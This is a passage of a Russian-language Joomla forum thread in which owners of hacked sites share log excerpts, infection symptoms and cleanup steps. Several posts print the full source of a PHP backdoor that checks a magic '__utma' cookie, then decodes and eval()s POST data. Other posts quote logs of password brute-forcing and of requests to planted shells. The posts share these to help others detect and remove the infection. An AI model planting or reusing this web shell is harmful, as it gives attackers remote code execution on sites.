[Решено] Заразились в один день 4 аккаунта по 10 сайтов

kudetolog

Новичок
9
0 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #60 : 03.05.2013, 23:23:22 »

Цитата: thedjsm от 03.05.2013, 22:57:00

Поможет т.к. данная атака ведётся из одного места с периодом 0,5 месяца.

а если на хостинге несколько сайтов, которые заражены - как узнать, на какой идет атака? Какого-то пика по посещаемости где-то не видно. Т.е. с какого по сути сайта пришла зараза

Записан

wishlight

Гуру
5078
320 / 1
От 300 руб быстрый хостинг. Сервера.

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #61 : 03.05.2013, 23:47:34 »

Обновляйте уже

Записан

Дедик, VDS, бекап по смешным ценам|Мои VDS быстрее твоих|Надежные VDS(скидка 10% ovz WPCLMX6YWG kvm 7SIHW75O9Q)|Хостинг против взломов|Решаю ваши проблемы.
Лечу от вирусов и хостинг
Защита сайтов и логи взломов

playtoppokerru

Осваиваюсь на форуме
30
0 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #62 : 04.05.2013, 00:44:06 »

Пожалуйста, объясните точнее, кого обновлять?

Записан

RostovDriver

Осваиваюсь на форуме
12
0 / 0

Re: Заразились в один день 4 аккаунта по 10 сайто&#

« Ответ #63 : 04.05.2013, 02:19:19 »

Вот какую штуку интересную только что нашел в логах.
На двух или трех сайтах в админке происходит уже почти 5 часов подбор паролей с IP 130.185.105.141 (анонимный прокси, на сколько я понял).
Более 400 штук уже попробовали.
Вот такое в логах
130.185.105.141 - - [04/May/2013:02:33:22 +0400] "GET /administrator/index.php HTTP/1.0" 200 5603 "-" "dJXHVYq UCVHAX94u S"
130.185.105.141 - - [04/May/2013:02:33:22 +0400] "POST /administrator/index.php HTTP/1.0" 200 5906 "-" "dJXHVYq UCVHAX94u S"
130.185.105.141 - - [04/May/2013:02:35:52 +0400] "GET /administrator/index.php HTTP/1.0" 200 5603 "-" "auqQCmvS3 cMl"
130.185.105.141 - - [04/May/2013:02:35:52 +0400] "POST /administrator/index.php HTTP/1.0" 200 5906 "-" "auqQCmvS3 cMl"

У меня вот еще какая мысля. Как я уже говорил, во фронтэнде запретил загрузку js , мне не надо, яндекс не ругается. Но в админке они грузятся, да и нужны они там mootools'ы всякие. Что и где прописать, чтобы для админки js грузились со стороннего сайта? Насколько я знаю, тот же mootools можно грузить с гугла.

« Последнее редактирование: 04.05.2013, 02:42:56 от RostovDriver »

Записан

RazarioAgro

Захожу иногда
473
4 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #64 : 04.05.2013, 03:07:02 »

тоже js файлы заразили, сделал бекап копию, думаете помогло?

Кто может посмотреть есть ли на сайте шелы, за помощь отблагодарю финансово, но в пределах разумного.

Записан

SorokinS

Захожу иногда
165
12 / 1

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #65 : 04.05.2013, 03:43:48 »

Восстанавливайте бэкапы, чтобы были чистые JS файлы. Быстро запускайте утилиту fls.php http://joomlaforum.ru/index.php/topic,198048.0.html

Удаляйте, если что покажет файл. Только внимательно, лишнего не удалите.

Потом обновляйте компоненты от NoNumber Framework Joomla.

Записан

RostovDriver

Осваиваюсь на форуме
12
0 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #66 : 04.05.2013, 04:33:08 »

Изучая логи, нашел следующее.
На одном из сайтов стояла Joomla 2.5.8 или 2.5.9, обновился до 2.5.11 уже после заражения. В логах встретил /plugins/user/profile/profiles/306511.php - очевидно вирь. Завалил и, не уверен, но кажется прям после этого даже вредоносный код в js пропал. Были открыты несколько окон с вредным кодом в js, а после удаления 306511.php просто обновил окна, а вредного кода в js уже нет.
Странно все это, вроде так не должно было быть.

Может быть кому поможет найти зловреда у себя, внутри файла /plugins/user/profile/profiles/306511.php следующее:

Цитировать

<?php if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){echo '<textarea id=areatext>';eval($msg);echo '</textarea>bg';exit;}} exit; ?>

Записан

headless

Осваиваюсь на форуме
15
0 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #67 : 04.05.2013, 09:11:12 »

Цитата: wishlight от 03.05.2013, 23:47:34

Обновляйте уже

мне, рядовому пользователю тоже не понятно чо делать то?

Записан

wishlight

Гуру
5078
320 / 1
От 300 руб быстрый хостинг. Сервера.

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #68 : 04.05.2013, 09:45:18 »

Цитата: SorokinS от 04.05.2013, 03:43:48

Потом обновляйте компоненты от NoNumber Framework Joomla.

Записан

Дедик, VDS, бекап по смешным ценам|Мои VDS быстрее твоих|Надежные VDS(скидка 10% ovz WPCLMX6YWG kvm 7SIHW75O9Q)|Хостинг против взломов|Решаю ваши проблемы.
Лечу от вирусов и хостинг
Защита сайтов и логи взломов

SashaOskol

Новичок
4
1 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #69 : 04.05.2013, 10:18:03 »

Так ребят у себя нашел тоже этот непонятный файл под названием 2b7b9f1219.php, лежал он у меня в папке public_html/images, если кому интересно, вот его содержание:

<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
echo '<textarea id=areatext>';
eval($msg);
echo '</textarea>bg';
exit;
}}
?>

Теперь пробую удалить файл почистить яваскрипты и подзолотать дыры

Записан

kudetolog

Новичок
9
0 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #70 : 04.05.2013, 10:29:50 »

не знаю, можно ли похвастаться... У себя я нашел бяку через файл access_log (проверял на каждом сайте свой, искал в нём "php"). В результатах поиска смотрел, чтобы путь был не по фронт-энду, а по пути ftp. Короче, нашел пару файлов на одном лишь сайте в папке /plugins/system/jsecure/jsecure и /plugins/system/jsecure/jsecure/css/ . Файлы 4a5af7ce.php и b7bd.php. Они могут похвастаться как раз вредоносным кодом:

Спойлер

[свернуть]

Записан

headless

Осваиваюсь на форуме
15
0 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #71 : 04.05.2013, 10:41:08 »

это 100% что эти коды с __utma и есть бяка вируса? я по прежнему думаю что это логи Google аналитик. http://otvety.google.ru/otvety/thread?tid=3dc2b45cb68a56dc&pli=1

Записан

kudetolog

Новичок
9
0 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #72 : 04.05.2013, 10:56:28 »

Цитата: headless от 04.05.2013, 10:41:08

это 100% что эти коды с __utma и есть бяка вируса? я по прежнему думаю что это логи Google аналитик. http://otvety.google.ru/otvety/thread?tid=3dc2b45cb68a56dc&pli=1

Возможно, $_COOKIE['__utma'] и кусок кода Google... Теоретически. (хотя что Google должен оставлять на моём сайте?) А вот весь остальной код с textarea id=areatext и base64_decode(@str_replace( лично мне не оставляет сомнений в том, что это и есть тело вируса. Его, так сказать, ядро

Записан

BDS

Осваиваюсь на форуме
31
1 / 0

Re: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #73 : 04.05.2013, 11:13:47 »

Всем привет! Принимайте и меня в свою компанию

Тот же Яндекс и тот же код.
Восстановил сайты (4 штуки) из копий (чистых), заблокировал IP (указанные на форуме).......... не прошло и 5 часов и зараза опять на месте
Проверил на код
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

Пусто ни одного совпадения ни на одном сайте. Я все же склоняюсь что дыра где то в движке Joomla или на хостинге
К стати сайты на NIC.ru

Записан

flyingspook

Moderator
3590
247 / 9

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #74 : 04.05.2013, 11:29:11 »

дополню топик читаем

Записан

ЛЕЧИМ САЙТЫ ОТ ВИРУСОВ и Shell! & НОВЫЙ СКАНЕР ПОИСКА Shell and BackDoor
Сканер поиска Shell and BackDoor
Отличный хостинг для Ваших сайтов. Настраиваем сервера.

BDS

Осваиваюсь на форуме
31
1 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #75 : 04.05.2013, 11:43:22 »

Ссылка полезная и информация не новая
Но вот проблема в том что на сайтах я не использую NoNumber Framework и Редактор JCE

Записан

BDS

Осваиваюсь на форуме
31
1 / 0

Re: Заразились в один день 4 аккаунта по 10 сайто&#

« Ответ #76 : 04.05.2013, 12:08:35 »

Вот ещё одна мысль.
Порылся в интернете и выяснил, что заражены только русскоязычные сайты. Пока не знаю к чему, но может все же к хостингу вопросы или......

Записан

flyingspook

Moderator
3590
247 / 9

Re: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #77 : 04.05.2013, 12:12:04 »

да не нова но все игнорируют это и чем чаше тыкать носом тем больше шансов что меньше народу пострадает, и всеж многие учатся на своих ошибках, ну ни чего с этим не поделать
вы привели код файла который заливался через JCE либо он есть на одном из сайтов либо стоял в момент заливки потом удалили и подумали что все не проверив сайт, или стоит на соседнем из сайтов, а на сервере не разграничены права, не буду холиварить но факт что именно эти файлы лили через дыру JCE

Цитировать

Вот ещё одна мысль.
Порылся в интернете и выяснил, что заражены только русскоязычные сайты. Пока не знаю к чему, но может все же к хостингу вопросы или......

потому что только русскоязычные используют эти два расширения, JCE дак вообще многие прямо в сборку пихали, а остальные тупо скачивали, nonumber вообще тупо все пользуются всеми его возможностями

Записан

ЛЕЧИМ САЙТЫ ОТ ВИРУСОВ и Shell! & НОВЫЙ СКАНЕР ПОИСКА Shell and BackDoor
Сканер поиска Shell and BackDoor
Отличный хостинг для Ваших сайтов. Настраиваем сервера.

draff

Гуру
5801
434 / 7
ищу работу

Re: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #78 : 04.05.2013, 12:16:57 »

А у кого еще стоят файловые менеджеры в админке Joomla, Akeeba ?
На хостинге nic.ru , к базам данных, всех сайтов одного акаунта, одинаковый пароль.

Записан

Удалю вирус с сайта. Обновление Joomla!, JoomShopping, Virtuemart Интеграция Retailcrm | Отзывы

BDS

Осваиваюсь на форуме
31
1 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #79 : 04.05.2013, 12:26:53 »

Да, скорее оно так и было. Но мы не вспоминаем прошлое, а пытаемся устранить эту заразу. И очень хочется узнать где она сидит и что нужно сделать что бы исключить возможность нового заражения

Записан

BDS

Осваиваюсь на форуме
31
1 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #80 : 04.05.2013, 12:33:59 »

У меня следующее
-Хостинг nic.ru
-4 сайта
-Пароли к БД разные
-Joomla 1.5.26
- Akeeba стоит
- файловые менеджеры не стоят (только стандартные компоненты)
- FTP использую с админским паролем ко всем сайтам
- JCE стоял и удалил

Проверил резервные копии и выяснил что еще 19 апреля эта зараза стояла, но Яндекс молчал

Записан

JASON X

Захожу иногда
155
9 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #81 : 04.05.2013, 13:21:44 »

Вчера ночью удалил все файлы сайтов, кроме файлов изображений, без смены паролей. С утра уже опять был вирус. Пошел протаренным путем - удалил, сменил пароли от ftp, БД и админок сайтов, но мать его... спустя 5 мин на сайтах опять вирусняк. Что за брешь? Я вообще... ну слов нет. Как быть... И как я понимаю смена хостера не поможет.

Записан

draff

Гуру
5801
434 / 7
ищу работу

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #82 : 04.05.2013, 13:57:32 »

Можешь логи хостинга выложить? Желательно под сполйер или архив
Именно за эти 5 мин

Записан

Удалю вирус с сайта. Обновление Joomla!, JoomShopping, Virtuemart Интеграция Retailcrm | Отзывы

kudetolog

Новичок
9
0 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #83 : 04.05.2013, 14:04:18 »

может, кому поможет... После удаления вируса по тому же принципу поиска с логах нашел еще один файл. Короче, суть:

93.189.43.39 - - [04/May/2013:13:02:20 +0400] "POST /libraries/joomla/image/f06b84c7da.php HTTP/1.0" 200 41 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"

Записан

KiryaBH

Новичок
3
0 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #84 : 04.05.2013, 14:09:22 »

Цитата: kudetolog от 04.05.2013, 14:04:18

может, кому поможет... После удаления вируса по тому же принципу поиска с логах нашел еще один файл. Короче, суть:

93.189.43.39 - - [04/May/2013:13:02:20 +0400] "POST /libraries/joomla/image/f06b84c7da.php HTTP/1.0" 200 41 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"

+1

Каждый час идет обращение к php файлам (назания разные по типу 87328a.php), папки абсолютно разные. Обращени идет с подсети 93.189.43.**

Проблема аналогична как у всех тут. Заражены все сайты на аккаунте, точно такой же код в js файлах. Из 15 сайтов только один на Joomla, остальные на WP

Записан

GlooM

Давно я тут
558
91 / 0
AdsManager

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #85 : 04.05.2013, 14:55:20 »

Тоже самое, но никак не найду источник...

Записан

Верстка, шаблоны, AdsManager

danslash

Осваиваюсь на форуме
19
1 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #86 : 04.05.2013, 15:13:46 »

Вчера почистил все, согласно прошлому посту. Пока никакой бяки не было.

Записан

maxop

Новичок
6
2 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #87 : 04.05.2013, 15:17:17 »

РЕШЕНИЕ ЕСТЬ!

1. Если у Вас несколько сайтов, то если хотя бы один взломан, на других JS будут с внедренным кодом. Значит первое что вы должны сделать узнать в папках какого из Ваших сайтов лежат файлы .php различного рода 87328a.php f06b84c7da.php и другие. Обнаружить их легко - по если дата изменения папки отличается от других папок, тогда заходим туда и ищем подозрительные файлы. у меня почти в каждом подразделе одного сайта такие были. очень много в /modules

2. Далее, как только определили на каком сайте находятся эти файлы, то если у Вас есть бэкам или сайт в архиве, то удаляем текущие файлы и устанавливаем из бэкапа и архива. проверяем чтобы этих файлов там не было

3. Если бэкапа нет, тогда включаете анализатор логов на хостинге и мониторите к какому именно файлу идет обращение, поскольку одного файла достаточно, чтобы он запустил редактирование всех js файлов хостинга. и как только определите сразу удаляйте именно этот файл, а потом удаляйте все. В любом случае лучше удалить все.

А дальше делаете бэкапы тех сайтов, на которых были изменены js файлы. После этого по новой они обновляться не будут.

Записан

Greycat

Захожу иногда
298
64 / 0

Re: Заразились в один день 4 аккаунта по 10 сайто&#

« Ответ #88 : 04.05.2013, 15:20:48 »

Вот и мне письмо счастья от Яндекса прилетело!

Разбор полётов:

Оказались заражены все *.js на двух сайтах одного аккаунта (хостинг nic.ru).
Антивирус Micosoft Securty Essencials на жизнь не жаловался. Свежие локальные сканеры Касперского и Sophos в резервной копии сайта ничего подозрительного не обнаружили. Между тем, Яндекс, судя по сообщениям в панели веб-мастера, заразу нашёл именно антивирусом Sophos.

Смена всех паролей не дала ничего - файлы продолжали заражаться каждый час после очистки.
Установка прав доступа 444 на файлы тоже ничего не дала - они каким-то чудом менялись на 644.
Даты заражённых файлов при этом менялись на какие-то старые, аж 2012 года.

Код заражения в js был следующий:

Спойлер

[свернуть]

Действия:

1. Сравнением с бекапом двухмесячной давности нашёл на одном из двух сайтов большое количество php файлов с явно левыми названиями, типа "ane7hs.php". Размер у всех был почему-то немного разный (200 - 300 байт), но код внутри одинаковый:

Спойлер

[свернуть]

Бекапы сайта от 29 апреля так же оказались заражены.

2. На обоих сайтах были установлены JCE и плагин CacheCleaner от NoNuber.
CacheCleaner и NoNumber Framework убил сразу, а JCE обновил до последней версии и пока оставил. Посмотрю "на его поведение".

3. Удалил с сервера все левые php.

4. Вычистил js на локальных копиях сайта и перезалил на сервер.

В течение двух часов заражения не происходит. Надеюсь кому-то поможет.

Записан

Я.д.=41001239962471 | WMR=R271925495206 | WMZ=Z144922023512

danslash

Осваиваюсь на форуме
19
1 / 0

RE: Заразились в один день 4 аккаунта по 10 сайтов

« Ответ #89 : 04.05.2013, 15:24:19 »

Об этом я и писал вчера.

Цитировать

Вроде все почистил. Пока все норм. Делал таким образом:
1) Пользуясь постоянно Хромом, удалил кеш, куки
2) Поменял пароль от хостинга (хотя думаю не в этом дело)
3) В Мозиле почистил все (кеши, куки)
4) Зашел на хостинг и скачал то что есть
5) В Тотал Коммандере искал файлы с текстом "echo '<textarea id=areatext>';" , "if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg'])))))" , "echo '</textarea>bg';" ,"/*214afaae*/" их оказалось очень много
6) Чистил данные файлы

Только плюс добавлю что чистить файлы нужно после удаления куки и кеша. А так походу куки остаются и то что вы чистите толку нету.

Записан

Изолирование папок сайтов на OpenServer Автор Lemady	Ответов: 41 Просмотров: 9037	29.11.2021, 15:47:31 от KoreshS
[Решено] В php файлах во всех появилась хрень какая-то появилось давно что это ? Автор altyn	Ответов: 72 Просмотров: 40123	17.01.2019, 00:51:02 от Roki37
Делаю почту в общих настройках через smtp - в тот же день ящик взломан Автор Mehanick	Ответов: 22 Просмотров: 2195	25.05.2018, 08:11:19 от dmitry_stas
На мобильном не работает сайт (решено, ошибка в андройде) Автор dragon4x4	Ответов: 5 Просмотров: 2579	01.03.2018, 22:46:10 от dragon4x4
В админке еще один администратор Автор Lidia	Ответов: 26 Просмотров: 2822	07.12.2017, 16:55:25 от Fess_N

Вышли релизы безопасности Joomla 6.0.4 и Joomla 5.4.4

👩‍💻 Joomla-ресурсы в мессенджере MAX.

👩‍💻 WT CDEK library v.1.3.0 - обновление PHP SDK для Joomla + CDEK.

Похожие темы